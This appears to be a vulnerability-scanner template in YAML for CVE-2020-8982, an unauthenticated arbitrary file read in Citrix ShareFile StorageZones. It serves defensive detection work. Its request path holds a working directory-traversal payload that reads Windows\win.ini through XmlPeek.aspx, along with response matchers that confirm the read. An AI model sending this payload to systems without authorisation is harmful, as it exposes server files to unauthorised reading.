23 lines
541 B
YAML
23 lines
541 B
YAML
id: CVE-2020-8982
|
|
|
|
info:
|
|
name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
|
|
author: dwisiswant0
|
|
severity: high
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
part: body |